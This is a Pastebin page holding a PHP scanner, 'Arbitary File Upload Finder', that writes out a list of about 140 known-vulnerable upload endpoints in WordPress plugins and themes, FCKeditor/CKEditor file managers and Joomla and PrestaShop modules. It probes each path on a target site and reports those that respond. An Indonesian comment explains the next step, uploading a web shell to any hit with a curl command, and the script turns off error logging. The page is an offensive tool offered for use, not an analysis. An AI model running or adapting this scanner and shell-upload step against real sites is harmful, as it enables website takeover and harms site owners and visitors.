Advertisement
AZZATSSINS_CYBERSERK

Arbitary File Upload Finder (Versi Beta)

Sep 12th, 2017
1,477
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.69 KB | None | 0 0
  1. <?php
  2. //AUTHOR | AZZATSSINS
  3. @error_reporting(0);
  4. @ini_set('output_buffering',0);
  5. @ini_set('display_errors', 0);
  6. @ini_set('log_errors',0);
  7. /*
  8. Simple tutor : pertama run script (php afu.php) , kmudian masukan site target (dg http://), trus scan, jika ada yang vuln (hijau), copas full urlnya, trus exec via curl ( curl -F postfile="@shellmu.php" url) cth: curl -F Filedata="@shell.php" http://azzatssins.int/vuln/upload.php
  9. */
  10. fwrite(fopen("vulnlist.txt","w"),"/wp-content/themes/pronto/cjl/pronto/uploadify/check.php
  11. /wp-content/plugins/1-flash-gallery/upload.php
  12. /wp-content/themes/zcool-like/uploadify.php
  13. /third-party/uploadify/uploadify.php
  14. /lib/uploadify/custom.php
  15. /wp-content/plugins/html5avmanager/lib/uploadify/custom.php
  16. /wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
  17. /wp-content/plugins/squace-mobile-publishing-plugin-for-wordpress/uploadify.php
  18. /wp-content/plugins/1-flash-gallery/js/uploadify/uploadify.php
  19. /wp-content/themes/aim-theme/lib/js/old/uploadify.php
  20. /wp-content/plugins/annonces/includes/lib/uploadify/uploadify.php
  21. /wp-content/plugins/apptivo-business-site/inc/jobs/files/uploadify/uploadify.php
  22. /wp-content/plugins/bulletproof-security/admin/uploadify/uploadify.php
  23. /wp-content/plugins/chillybin-competition/js/uploadify/uploadify.php
  24. /wp-content/plugins/comments_plugin/uploadify/uploadify.php
  25. /wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php
  26. /wp-content/plugins/doptg/libraries/php/uploadify.php
  27. /wp-content/plugins/pods/js/uploadify.php
  28. /wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
  29. /wp-content/plugins/qr-color-code-generator-basic/QR-Color-Code-Generator/uploadify/uploadify.php
  30. /wp-content/plugins/wp-symposium/uploadify/uploadify.php
  31. /wp-content/plugins/uploader/uploadify.php
  32. /wp-content/plugins/uploadify/includes/process_upload.php
  33. /wp-content/plugins/very-simple-post-images/uploadify/uploadify.php
  34. /fileman/
  35. /ckeditor/fileman/
  36. /ckeditor/plugins/fileman/
  37. /RoxyFileman/fileman/
  38. /assets/fileman/
  39. /wp-content/plugins/ckeditor-for-wordpress/includes/upload.php
  40. /fckeditor/editor/filemanager/browser/upload/php/upload.php
  41. /assets/backend/ckeditor/kcfinder/?ckact:upload
  42. /FCKeditor/editor/filemanager/upload/test.html
  43. /fckeditor/editor/filemanager/connectors/upload.php?Type=File
  44. /plugins/p_fckeditor/ckeditor/plugins/filemanager/
  45. /ckeditor/ckfinder/ckfinder.html?Type=Files
  46. /ckeditor/ckfinder/ckfinder.html?Type=Images
  47. /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
  48. /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/frmupload.html
  49. /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/test.html
  50. /wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html
  51. /wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
  52. /wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/uploadtest.html
  53. /wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/test.html
  54. /wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
  55. /wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html
  56. /wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
  57. /admin/fckeditor/editor/filemanager/upload/test.html
  58. /admin/FCKeditor/editor/filemanager/connectors/uploadtest.html
  59. /FCKeditor/editor/filemanager/connectors/test.html
  60. /system/fckeditor/editor/filemanager/browser/default/connectors/test.html
  61. /FCKeditor/_samples/asp/sample01.asp
  62. /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
  63. /mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html
  64. /mambots/editors/fckeditor/editor/filemanager/connectors/uploadtest.html
  65. /ckeditor/samples/plugins/htmlwriter/outputhtml.html
  66. /wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
  67. /wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
  68. /wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php
  69. /wp-content/plugins/mac-dock-gallery/upload-file.php
  70. /wp-content/themes/kernel-theme/functions/upload-handler.php
  71. /wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php
  72. /wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php
  73. /wp-content/plugins/dzs-zoomsounds/admin/upload.php
  74. /wp-content/themes/dandelion/functions/upload-handler.php
  75. /wp-content/plugins/wordpress-member-private-conversation/doupload.php
  76. /wp-content/themes/Elemin/themify/themify-ajax.php?upload=1
  77. /wp-content/themes/Bloggie/themify/themify-ajax.php?upload=1
  78. /wp-content/themes/Tisa/themify/themify-ajax.php?upload=1
  79. /wp-content/themes/Funki/themify/themify-ajax.php?upload=1
  80. /wp-content/themes/Pinboard/themify/themify-ajax.php?upload=1
  81. /wp-content/themes/Folo/themify/themify-ajax.php?upload=1
  82. /wp-content/themes/grido/themify/themify-ajax.php?upload=1
  83. /wp-content/themes/Suco/themify/themify-ajax.php?upload=1
  84. /wp-content/themes/iThemes2/themify/themify-ajax.php?upload=1
  85. /wp-content/themes/fullpane/themify/themify-ajax.php?upload=1
  86. /wp-content/themes/simfo/themify/themify-ajax.php?upload=1
  87. /wp-content/themes/rezo/themify/themify-ajax.php?upload=1
  88. /wp-content/themes/bizco/themify/themify-ajax.php?upload=1
  89. /wp-content/themes/minshop/themify/themify-ajax.php?upload=1
  90. /wp-content/themes/themify-landing/themify/themify-ajax.php?upload=1
  91. /wp-content/themes/themify-elegant/themify/themify-ajax.php?upload=1
  92. /wp-content/themes/themify-base/themify/themify-ajax.php?upload=1
  93. /wp-content/themes/themify-corporate/themify/themify-ajax.php?upload=1
  94. /wp-content/themes/themify-music/themify/themify-ajax.php?upload=1
  95. /wp-content/themes/postline/themify/themify-ajax.php?upload=1
  96. /wp-content/themes/newbasic/themify/themify-ajax.php?upload=1
  97. /wp-content/plugins/viral-optins/api/uploader/file-uploader.php
  98. /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
  99. /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
  100. /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
  101. /wp-content/themes/honestkim/js/redactor/demo/scripts/file_upload.php
  102. /wp-content/plugins/html5avmanager/lib/uploadify/custom.php
  103. /cms/HTMLEditor/editor/filemanager/connectors/test.html
  104. /CMS/HTMLEditor/editor/filemanager/connectors/test.html
  105. /Editor/editor/filemanager/upload/test.html
  106. /admin/templates/fckeditor/editor/filemanager/upload/test.html
  107. /javascripts/fckeditor/editor/filemanager/connectors/test.html
  108. /admin/htmleditor/editor/filemanager/connectors/test.html
  109. /admin/classes/components/formattedTextArea/fckeditor/editor/filemanager/browser/default/frmupload.html
  110. /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
  111. /wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/upload/test.html
  112. /wp-content/themes/famous/megaframe/megapanel/inc/upload.php
  113. /wp-content/plugins/lim4wp/includes/upload.php
  114. /wp-content/plugins/arcadepress/php/upload.php
  115. /wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php
  116. /wp-content/themes/photocrati-theme/admin/upload_edit.php
  117. /wp-content/plugins/custom-background/uploadify/uploadify.php
  118. /wp-content/plugins/placester/js/uploadify/uploadify.php
  119. /wp-content/plugins/custom-content-type-manager/upload_form.php
  120. /wp-content/plugins/drag-drop-file-uploader/dnd-upload.php
  121. /wp-content/plugins/mac-dock-gallery/upload-file.php
  122. /wp-content/plugins/foxypress/uploadify/uploadify.php
  123. /wp-content/plugins/asset-manager/upload.php
  124. /wp-content/plugins/font-uploader/font-upload.php
  125. /wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php
  126. /wp-content/plugins/gallery-plugin/upload/php.php
  127. /wp-content/plugins/front-end-upload/upload.php
  128. /wp-content/plugins/omni-secure-files/plupload/examples/upload.php
  129. /wp-content/plugins/wpstorecart/php/upload.php
  130. /wp-content/plugins/image-gallery-with-slideshow/upload-file.php
  131. /elFinder/php/connector.php
  132. /_file-manager/php/connector.php
  133. /assets/php/connector.php
  134. /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form
  135. /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
  136. /index.php?option=com_jdownloads&Itemid=0&view=upload
  137. /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
  138. /js/webforms/upload/
  139. /modules/simpleslideshow/uploadimage.php
  140. /modules/productpageadverts/uploadimage.php
  141. /modules/columnadverts/uploadimage.php
  142. /modules/homepageadvertise/uploadimage.php
  143. /modules/attributewizardpro/file_upload.php
  144. /modules/vtemslideshow/uploadimage.php
  145. /modules/blocktestimonial/addtestimonial.php
  146. /ajax/api/hook/decodeArguments?arguments=
  147. /elearningku/proses.php?pilih=guru&untukdi=upload");
  148. print "\e[34m   ___ ________  ___ ___________________  ______
  149.  / _ /_  /_  / / _ /_  __/ __/ __/  _/ |/ / __/
  150. / __ |/ /_/ /_/ __ |/ / _\ \_\ \_/ //    /\ \  
  151. /_/ |_/___/___/_/ |_/_/ /___/___/___/_/|_/___/  
  152.                                                
  153.                                                
  154. ";
  155. echo "\e[93m\n#######AFU FINDER BY AZZATSSINS######\n";
  156. echo "\nInput URL : "; $target=trim(fgets(STDIN));
  157. $page=explode("\n", file_get_contents('vulnlist.txt'));
  158. foreach($page as $lol) {
  159. $cyberserkers=$target."/".$lol;
  160. $ch=curl_init($cyberserkers);
  161. curl_setopt($ch, CURLOPT_NOBODY, true);
  162. curl_exec($ch);
  163. $azzatssins=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  164. curl_close($ch);
  165. if($azzatssins==200){
  166. echo "\e[92m \n>> ". $cyberserkers." [Check it > Status 200 OK]";
  167. }elseif($azzatssins==302){
  168. echo "\e[92m \n>> ". $cyberserkers." [Check it > Status 302 Found]";
  169. }else{
  170. echo "\e[91m \n". $cyberserkers." ( ".$azzatssins." )\n";
  171. }}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement